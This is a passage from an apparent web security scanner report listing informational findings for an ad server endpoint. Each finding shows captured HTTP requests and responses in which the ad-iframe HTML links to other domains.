Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0097.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:21:30 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601289_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlj11rgzAUhn-Ndy7kq34gu4g6i6yRCbWlvRGrsXarxkVHxV-.dJb-gR3CyfsenvOGIOJRRKiNXLuCWNTUtT1EcGljB9uOZULP8zCBGrBdC5lD7FcsRDBmwb60UvZXoRu-L0r30GFpvLgPh4FbCACVit-W0Td
...[SNIP]...
hZp-jYxhN.fEnvv5pmM469QZiBI30qMKqiEhOQvegmUMpWD4tagb7RUKRErcTQGCSk0MDWLDtxqbSzVujuy5PWl24QasxV0VWyzbuf9iRU3gglNHCVpSZ-AQtScc8=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601289_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601289_HERE" border="0" alt=""></a>
...[SNIP]...
19.26. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIom7hIeDRCnDEpH0AyJ31wNw6CoxcIwypJaJXAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2085053475%26r%3D0%26s%3D2126909,03906192-ed53-11e0-ba3a-78e7d15f6a8a,1317600161897 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0123.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:03:13 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600161_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlT9tugzAM.RreUERIuAntITRDQmu6VYqKuhcUIAxEISxlKuPrl42qPzDLss-xjo9liOIIRzAQjcACo0hEYQyRWwUw8Evk2k4cx9jxoYeCwIP2NUtqQqGTkV1e-UfyFzSiLxsylYbkmG3sLSTgRgHASrPbNvp
...[SNIP]...
ndM34aDsMzPt9fMvtPtt3O82QhYrmpyRrMWtRyAWqS4wIqNZihaDSYWiNKtWy0vLYWotixXH9Vo-xqw3wP.vKqNLgbr1LPhRZjrYZi.BpKqYtWamkEF1UZxQ8.jHL4,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600161_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600161_HERE" border="0" alt=""></a>
...[SNIP]...
19.27. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABKtxdDl-TRCl0t8tKcSElDV6C7bJRQgwnhGiL4AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D552373029%26r%3D0%26s%3D2126909,abfde780-ed55-11e0-b755-78e7d15fbc50,1317601303466 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:44 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0204.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:21:44 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601303_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljNFqgzAUhp.GOwlJtFmK7CLWOWSNrMN2rDeiJlapGhcdik-.MIsvsMPhnP8.fOdHjudAKbLSzYmUcFcS10MOLp4wJZAIG3qeh11CEaYUU3uIfMECBCN2eCnIif1VsA.eVmVmQNlJre6dMjAFALhK82k9fXM
...[SNIP]...
V7TcSdJ5f2q-WIb4.s2barcewth1k4NC3AqDMhZ6B62c2gUK05ZqUGfWWgUMtSy6GynMCFFiaL6mQtjCM7uDe-yI2uu0HqMdVZJ1Sbdj9tLnVaSS0N0KjCEL.Fx3Ry,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601303_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601303_HERE" border="0" alt=""></a>
...[SNIP]...
19.28. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABosjPWsOXRCmiu9KUhHh5KA4YFjhmN6cF0gdqbAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3150971163%26r%3D0%26s%3D2126909,53ae006e-ed56-11e0-923c-079feb299fc6,1317601584799 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:25 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0057.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:26:25 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601584_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlTF1rgzAU.TW-SYjxs8geYjNBVt0KbcW-SEzSWafGRYfir1-YpX9gl8s9H5x7LDusXE6Rw4IAcUirAIaWjZiPGKXUN2EYhgj6CLq2hXxzTCKOiQUTvH9l3hH.DdmRt43pSwJ8lJv6CDCYCQCOVOm8Wd9pAJ.
...[SNIP]...
.5tS2axNXYZI8e.f9imvU0DYaNDRTr5WBSlIsFyEH0C2Cy0ya9KTDUOhQrcVNirA2bONBA3ip7cedaeS7cac0qze.9KNRUKtpz2ZX9T1cJVdZCCR1oJdOJX6N9dAc=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601584_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601584_HERE" border="0" alt=""></a>
...[SNIP]...
19.29. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbySfKQOPRCuBtW9eAxjfSuncSlpuoh7Cd0y0tAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3058821903%26r%3D0%26s%3D2126909,df6669f4-ed54-11e0-b136-78e7d16291d8,1317600960218 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:29 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0305.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:16:29 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600960_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljN1OhDAQhZ-GO9KUFlgI8aJsxRC3i5jGDd4QKEX2B7oWzOI-vY0YXsDJZOY7kzPHwVHgCbf12jDcQIw8WEcORmKDcNDWyIZRFBnEeOMhCO0xjRtCHZiS7aPwc.JbNKTPC5lJA5KrRb0EBNwoAK7S7LacPlk
...[SNIP]...
sz48V3xpNztj6SB9vupulqYWKhxHQDJl01cgbqKocZCNWbY9VqcO2MKdGy1XLsLExdaCH.rgZ5bIzyPRgaLWrDx2GUeip1NTSqL4evvpa67KSWxnBRwjh-AAC5cpo=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600960_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600960_HERE" border="0" alt=""></a>
...[SNIP]...
19.30. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4jrx9Nd7RCrhB5Zrbr2L6GIntVCa9kyBZ.WWIAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D3447929958%26r%3D0%26s%3D2126909,de3027bc-ed51-11e0-9772-78e7d1fa0588,1317599669694 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:55:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0147.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:55:13 GMT
Pragma: no-cache
Content-Length: 1842
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599669_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGljN9OgzAUxp-GO9K05X-IF8WKQda5GXRxNwTaTuaAbh26jae3EcMLeHJyzu87-c6HnDiEkkeBA6MoCmokRIwczAMEUSQcG8ZxjH2MPQ8HMLTPWSIIRTAjSZ6f1uS3aETzicykIVm.T2oVEnChALhKs8t0OrE
...[SNIP]...
uCu9tCHNhm2zD66j7Pj-TOtpthOFoOsXBqWoBBV0JegTrK.gq46syx2mlwbIwp1XKn5bmxHOpCC.uj6uVeGOV7CBnNa8P7.iz1UOqqF6or-6-ulrpspJbG0CpuHD9w23MV,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599669_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599669_HERE" border="0" alt=""></a>
...[SNIP]...
19.31. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD.5pV5KN.RCqveLM1jpvVjw4XAG1Qbq6rZDktHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D3020283874%26r%3D0%26s%3D2126909,6ee5d252-ed52-11e0-acd3-3c4a92f2cdf2,1317599912477 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:57 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0258.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:58:57 GMT
Pragma: no-cache
Content-Length: 1850
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599912_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGlTMtugzAQ.BpuyPIDAhbqAeqmtRKj0tJU5IIIOCUPMDFUSfj6WCXKD3R3tTszmh1Egg2l1ENVCRGGxKEwQASXHiK-aRsGQUAI9aiHXcezex5VIUOQh9FicUrCv2KULSZkNvPDJJvYux-CMwPAUVqcJ-kkfPi
...[SNIP]...
-uaLJrhj8acc8x.0-2XQ9DZ5HQwnMzFRh0UckLUJ1sL6BUjRGLrQZdbUxzLbda9rVFmAMtPBtVK3eVYTMXIcPLjcG7tpd6yHXRVqrJ299mI3VeSy2N4ahK47gBu7JyvQ==,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599912_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599912_HERE" border="0" alt=""></a>
...[SNIP]...
19.32. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC.Mym1ieXRCn61.ExypkcGjPL1Z3BibicXE1bNAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1515508248%26r%3D0%26s%3D2126909,3c054a08-ed56-11e0-9921-78e7d1614f42,1317601545106 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:25:45 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0163.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:25:45 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601545_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljN1ugzAMhZ-GOxQl.CO0i9CMCa3pVinbxG4QJG7paEkXmIr69ItG1ReYZdnfsY4P8TOFJUkAwE-bOG0JZMT3ZOxJLOPQxVmWkcgLUy8hke-OZa4oI7ikq0cZbelfsZQ9L2QnS-hWL-o1oejCEAq04Zfl9M0
...[SNIP]...
TPRTVvnirMbzn2.8F1u2k6Oz51vMK2QpNpFMxIn2GYkdQne2x2Bp07ayoM7AyMneOzADtedNUDHJRVUYhTq2Vr-TCMYKbaNIPSp3r4ObVg6g4MWMNRS-v4BVk8c5s=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601545_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601545_HERE" border="0" alt=""></a>
...[SNIP]...
19.33. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

